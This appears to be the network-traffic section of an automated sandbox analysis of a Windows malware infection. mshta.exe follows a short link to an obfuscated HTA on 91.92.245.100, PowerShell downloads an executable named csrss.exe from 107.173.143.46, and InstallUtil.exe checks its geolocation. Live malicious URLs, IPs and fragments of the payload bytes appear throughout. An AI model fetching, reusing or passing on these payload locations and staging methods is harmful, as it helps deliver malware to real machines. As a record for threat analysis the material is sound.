                Jul 26, 2024 09:29:57.196409941 CEST1236INData Raw: 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25
                Data Ascii: %25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30
                Jul 26, 2024 09:29:57.196422100 CEST1236INData Raw: 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25
                Data Ascii: %32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25
                Jul 26, 2024 09:29:57.196433067 CEST1236INData Raw: 25 37 32 25 37 36 25 34 33 25 36 44 25 36 45 25 34 35 25 37 33 25 35 33 25 37 36 25 37 33 25 34 39 25 37 41 25 36 45 25 35 34 25 36 42 25 35 33 25 37 37 25 35 30 25 37 30 25 36 37 25 36 44 25 34 46 25 37 35 25 35 39 25 37 38 25 36 34 25 36 31 25
                Data Ascii: %72%76%43%6D%6E%45%73%53%76%73%49%7A%6E%54%6B%53%77%50%70%67%6D%4F%75%59%78%64%61%57%70%42%53%59%4D%52%6C%6E%5A%57%46%72%6F%4B%48%76%53%59%6B%54%6D%49%51%6D%50%6F%70%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32
                Jul 26, 2024 09:29:57.196439981 CEST1236INData Raw: 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25
                Data Ascii: %25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30
                Jul 26, 2024 09:29:57.201488972 CEST1236INData Raw: 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25
                Data Ascii: %32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                2192.168.2.2249165188.114.96.3803296C:\Windows\System32\mshta.exe
                TimestampBytes transferredDirectionData
                Jul 26, 2024 09:29:57.731762886 CEST344OUTGET /jjJsPX HTTP/1.1
                Accept: */*
                Accept-Language: en-US
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: tny.wtf
                Connection: Keep-Alive
                Jul 26, 2024 09:29:58.860368013 CEST616INHTTP/1.1 302 Found
                Date: Fri, 26 Jul 2024 07:29:58 GMT
                Transfer-Encoding: chunked
                Connection: keep-alive
                Location: http://91.92.245.100/xampp/ebcd/eb/gdfvr.hta
                X-Powered-By: ASP.NET
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LqIu%2FrL%2FRffzuybUVz1ozElaFAjJLK2%2FeU1lC7MBcOUQomv1migrRFZkuqg8nQwpd8jv%2F%2BtnQgtQ6uUqBiePgTHD3PJQXNH9N865lqTAjzu5F16mWng0MGGJ"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8a92ae827ec14374-EWR
                alt-svc: h3=":443"; ma=86400
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                3192.168.2.224916691.92.245.100803296C:\Windows\System32\mshta.exe
                TimestampBytes transferredDirectionData
                Jul 26, 2024 09:29:58.880737066 CEST420OUTGET /xampp/ebcd/eb/gdfvr.hta HTTP/1.1
                Accept: */*
                Accept-Language: en-US
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Range: bytes=8895-
                Connection: Keep-Alive
                Host: 91.92.245.100
                If-Range: "25ddd-61e14da080a28"
                Jul 26, 2024 09:29:59.517443895 CEST1236INHTTP/1.1 206 Partial Content
                Date: Fri, 26 Jul 2024 07:29:59 GMT
                Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
                Last-Modified: Thu, 25 Jul 2024 16:26:06 GMT
                ETag: "25ddd-61e14da080a28"
                Accept-Ranges: bytes
                Content-Length: 146206
                Content-Range: bytes 8895-155100/155101
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: application/hta
                Data Raw: 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 [TRUNCATED]
                Data Ascii: %25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%6E%58%42%46%55%45%6D%4D%52%58%4E%45%75%6C%73%4F%58%71%67%4E%46%58%45%72%65%64%54%52%53%71%53%67%42%53%4C%6A%41%44%4E%4F%56%6E%72%72%45%70%69%6F%4A%76%52%76%68%51%45%45%49%79%70%4B%50%4C%4E%58%77%65%6C%68%6F%73%67%44%57%56%66%50%54%72%71%62%58%6A%54%75%59%64%4A%4F%45%64%76%4D%7A%6A%4F%4B%4E%6F%63%74%7A%66%52%42%4C%45%65%55%43%41%72%76%43%6D%6E%45%73%53%76%73%49%7A%6E%54%6B%53%77%50%70%67%6D%4F%75%59%78%64%61%57%70%42%53%59%4D%52%6C%6E%5A%57%46%72%6F%4B%48%76%53%59%6B%54%6D%49%51%6D%50%6F%70%25%32%30%25%32%30%25%32
                Jul 26, 2024 09:29:59.517467022 CEST1236INData Raw: 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25
                Data Ascii: %30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32
                Jul 26, 2024 09:29:59.517477989 CEST448INData Raw: 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25
                Data Ascii: %25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30
                Jul 26, 2024 09:29:59.517498970 CEST1236INData Raw: 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33
                Data Ascii: 30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%
                Jul 26, 2024 09:29:59.517513037 CEST1236INData Raw: 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32
                Data Ascii: 25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%
                Jul 26, 2024 09:29:59.517524004 CEST1236INData Raw: 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33
                Data Ascii: 32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%
                Jul 26, 2024 09:29:59.517585039 CEST1236INData Raw: 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33
                Data Ascii: 30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%
                Jul 26, 2024 09:29:59.517596960 CEST1236INData Raw: 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32
                Data Ascii: 25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%
                Jul 26, 2024 09:29:59.517606020 CEST1236INData Raw: 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33
                Data Ascii: 32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%5A%66%6D%51%54%73%68%77%6F%48%63%4C%49%57%65%65%77%70%6B%7A%6C%6A%59%63%6E%6D%48%4E%66%62%44%
                Jul 26, 2024 09:29:59.517616034 CEST1236INData Raw: 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33
                Data Ascii: 30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%
                Jul 26, 2024 09:29:59.522723913 CEST1236INData Raw: 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32
                Data Ascii: 25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                4192.168.2.2249167107.173.143.46803400C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                Jul 26, 2024 09:30:07.463278055 CEST337OUTGET /T2507F/csrss.exe HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 107.173.143.46
                Connection: Keep-Alive
                Jul 26, 2024 09:30:07.961440086 CEST1236INHTTP/1.1 200 OK
                Date: Fri, 26 Jul 2024 07:30:07 GMT
                Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
                Last-Modified: Fri, 26 Jul 2024 06:04:08 GMT
                ETag: "28ca00-61e204785c600"
                Accept-Ranges: bytes
                Content-Length: 2673152
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: application/lnk
                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 60 0f d7 18 24 6e b9 4b 24 6e b9 4b 24 6e b9 4b e7 ed ba 4a 2d 6e b9 4b e7 ed bd 4a 28 6e b9 4b e7 ed bc 4a 0a 6e b9 4b 2d 16 2a 4b 2a 6e b9 4b 6f 16 b8 4a 2d 6e b9 4b 24 6e b8 4b dc 6e b9 4b e5 12 ba 4a 2f 6e b9 4b e5 12 bc 4a 60 6e b9 4b 24 6e b9 4b 25 6e b9 4b 37 ea b9 4a 25 6e b9 4b 37 ea 46 4b 25 6e b9 4b 37 ea bb 4a 25 6e b9 4b 52 69 63 68 24 6e b9 4b 00 00 00 00 00 00 00 00 50 45 00 00 64 86 08 00 6d d0 a2 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 84 13 00 00 42 15 00 00 f8 05 00 c0 8e 06 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 [TRUNCATED]
                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$`$nK$nK$nKJ-nKJ(nKJnK-*K*nKoJ-nK$nKnKJ/nKJ`nK$nK%nK7J%nK7FK%nK7J%nKRich$nKPEdmf"(B@/`%XH%0(&8/<P"T"("@0.texth `.managedq0r `hydrated`.rdata&HJ@@.data&"@.pdata8&:@@.rsrc0(.!@@.reloc</(@B
                Jul 26, 2024 09:30:07.961467028 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Data Ascii: HRHRyuHpHSHRyuHpHwSH`SyuHpHrSH[SyuHlpH}SHfSy
                Jul 26, 2024 09:30:07.961479902 CEST1236INData Raw: 57 6c 0b 00 48 8d 05 40 f5 25 00 48 8b 00 48 8d 0d f6 4f 15 00 83 79 08 01 75 01 c3 48 8b d0 e9 37 6c 0b 00 48 8d 05 28 f5 25 00 48 8b 00 48 8d 0d e6 4f 15 00 83 79 08 01 75 01 c3 48 8b d0 e9 17 6c 0b 00 48 8d 05 10 f5 25 00 48 8b 00 48 8d 0d d6
                Data Ascii: WlH@%HHOyuH7lH(%HHOyuHlH%HHOyuHkH%HHOyuHkH%HHOyuHkH%HHOyuHkH%HHOyuHwkH%HHO
                Jul 26, 2024 09:30:07.961503983 CEST1236INData Raw: 00 83 79 08 01 75 01 c3 48 8b d0 e9 77 67 0b 00 48 8d 05 d0 f2 25 00 48 8b 00 48 8d 0d d6 4e 15 00 83 79 08 01 75 01 c3 48 8b d0 e9 57 67 0b 00 48 8d 05 d0 f2 25 00 48 8b 00 48 8d 0d de 4e 15 00 83 79 08 01 75 01 c3 48 8b d0 e9 37 67 0b 00 48 8d
                Data Ascii: yuHwgH%HHNyuHWgH%HHNyuH7gH%HHNyuHgH%HHNyuHfH%HHNyuHfHp%HHNyuHfHh%HHNyuHfH
                Jul 26, 2024 09:30:07.961515903 CEST1236INData Raw: 07 00 4c 8d 05 8a b2 10 00 e9 55 ac 07 00 4c 8d 05 9e b5 10 00 e9 49 ac 07 00 4c 8d 05 d2 c2 10 00 e9 3d ac 07 00 4c 8d 05 66 ca 10 00 e9 31 ac 07 00 4c 8d 05 ca d7 10 00 e9 25 ac 07 00 4c 8d 05 be db 10 00 e9 19 ac 07 00 4c 8d 05 f2 ea 10 00 e9
                Data Ascii: LULIL=Lf1L%LLLFLZLLL$LLnLgLW[LdLWHL9L5LLM
                Jul 26, 2024 09:30:07.961527109 CEST1236INData Raw: 85 c0 74 0b 80 39 00 80 3a 00 e9 e0 e5 06 00 48 8b c1 c3 66 66 66 66 0f 1f 84 00 00 00 00 00 4d 85 c0 74 0b 80 39 00 80 3a 00 e9 a0 11 00 00 48 8b c1 c3 66 66 66 66 0f 1f 84 00 00 00 00 00 4d 85 c0 74 0b 80 39 00 80 3a 00 e9 00 12 00 00 48 8b c1
                Data Ascii: t9:HffffMt9:HffffMt9:HffffMt9:HffffHH%H-I;f"&eL%XMIDAD;s$LKHtLA;PsIDHtW
                Jul 26, 2024 09:30:07.961539984 CEST1236INData Raw: 00 42 80 3c 11 ff 74 18 42 c6 04 11 ff 48 c1 e9 0a 48 03 0d bb 51 26 00 80 39 ff 74 03 c6 01 ff c3 66 66 0f 1f 84 00 00 00 00 00 48 8b 0e 48 89 0f 48 3b 3d 73 51 26 00 72 69 48 3b 3d 72 51 26 00 73 60 4c 8b 1d 91 51 26 00 49 83 fb 00 74 14 4c 8b
                Data Ascii: B<tBHHQ&9tffHHH;=sQ&riH;=rQ&s`LQ&ItLIMA:uAH;%r6H;%s-HHL?Q&B<tBHH8Q&9tHHD1&eL%XOAML$LQHiLL\$A
                Jul 26, 2024 09:30:07.961589098 CEST1236INData Raw: 88 00 00 00 0f 94 84 24 d0 00 00 00 f0 83 60 38 ef 49 8b 40 18 48 8b 18 49 8b 40 20 48 8b 28 49 8b 40 28 48 8b 30 49 8b 40 30 48 8b 38 49 8b 40 58 4c 8b 20 49 8b 40 60 4c 8b 28 49 8b 40 68 4c 8b 30 49 8b 40 70 4c 8b 38 66 41 0f 6f b0 90 00 00 00
                Data Ascii: $`8I@HI@ H(I@(H0I@0H8I@XL I@`L(I@hL0I@pL8fAofAofEofEofEofEofEofEofEofEo IHxH$ $(L$0H$HJpHtLJhIHBhHBpH$8M@x
                Jul 26, 2024 09:30:07.961601019 CEST1236INData Raw: 79 49 8b 41 f8 48 89 42 f8 eb 6f 49 83 f8 20 72 41 4c 8b ca 4d 8b d0 4c 2b cb 49 c1 ea 05 0f 1f 44 00 00 48 8b 02 48 83 c2 20 48 89 01 49 8b 44 09 08 48 89 41 08 49 8b 44 09 10 48 89 41 10 4a 8b 44 09 18 48 89 41 18 48 83 c1 20 49 83 ea 01 75 d1
                Data Ascii: yIAHBoI rALML+IDHH HIDHAIDHAJDHAH IuAtHHHBHHAHAtHHH;G&H;}G&I=G&H|$0J<t&HLGHIL+HeG&I=H>G&LIHHL+H
                Jul 26, 2024 09:30:07.961611986 CEST1236INData Raw: 75 ef 48 8b 15 4e 43 26 00 4c 8d 87 ff ff 1f 00 48 8b 7c 24 30 48 8b cb 48 c1 e9 15 49 c1 e8 15 4c 2b c1 48 03 d1 80 3a ff 74 03 c6 02 ff 48 ff c2 49 83 e8 01 75 ef 48 8b c3 48 83 c4 20 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c
                Data Ascii: uHNC&LH|$0HHIL+H:tHIuHH [H\$Ht$WH HH0HHHHAH"4HH3HtWH;uH3Hx(CH;=?&aHn"{HWE3HS
                Jul 26, 2024 09:30:07.966567993 CEST1236INData Raw: 00 84 c0 74 0d 33 d2 33 c9 44 8d 42 01 e8 a2 4f 06 00 48 8b cb 48 83 c4 20 5b e9 6c 27 00 00 cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 18 48 89 74 24 20 57 48 83 ec 20 48 8b 01 49 8b f1 48 8d 4c 24 30 48 89 44 24 30 49 8b f8 8b da e8 e7 2f
                Data Ascii: t33DBOHH [l'H\$Ht$ WH HIHL$0HD$0I/,HLD$8tnL$8HH\$@H3HHt$HH _H\$WH H@2;/HH0thHHu{u{u{uCHK@<uy%uHcAHDH\$0H


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                5192.168.2.2249169178.237.33.50803660C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                TimestampBytes transferredDirectionData
                Jul 26, 2024 09:30:19.592058897 CEST71OUTGET /json.gp HTTP/1.1
                Host: geoplugin.net
                Cache-Control: no-cache
                Jul 26, 2024 09:30:20.216634989 CEST1170INHTTP/1.1 200 OK
                date: Fri, 26 Jul 2024 07:30:20 GMT
                server: Apache
                content-length: 962
                content-type: application/json; charset=utf-8
                cache-control: public, max-age=300
                access-control-allow-origin: *
                Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                6192.168.2.2249172188.114.96.3803828C:\Windows\System32\mshta.exe
                TimestampBytes transferredDirectionData
                Jul 26, 2024 09:30:22.289392948 CEST344OUTGET /jjJsPX HTTP/1.1
                Accept: */*
                Accept-Language: en-US
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: tny.wtf
                Connection: Keep-Alive
                Jul 26, 2024 09:30:23.426986933 CEST608INHTTP/1.1 302 Found
                Date: Fri, 26 Jul 2024 07:30:23 GMT
                Transfer-Encoding: chunked
                Connection: keep-alive
                Location: http://91.92.245.100/xampp/ebcd/eb/gdfvr.hta
                X-Powered-By: ASP.NET
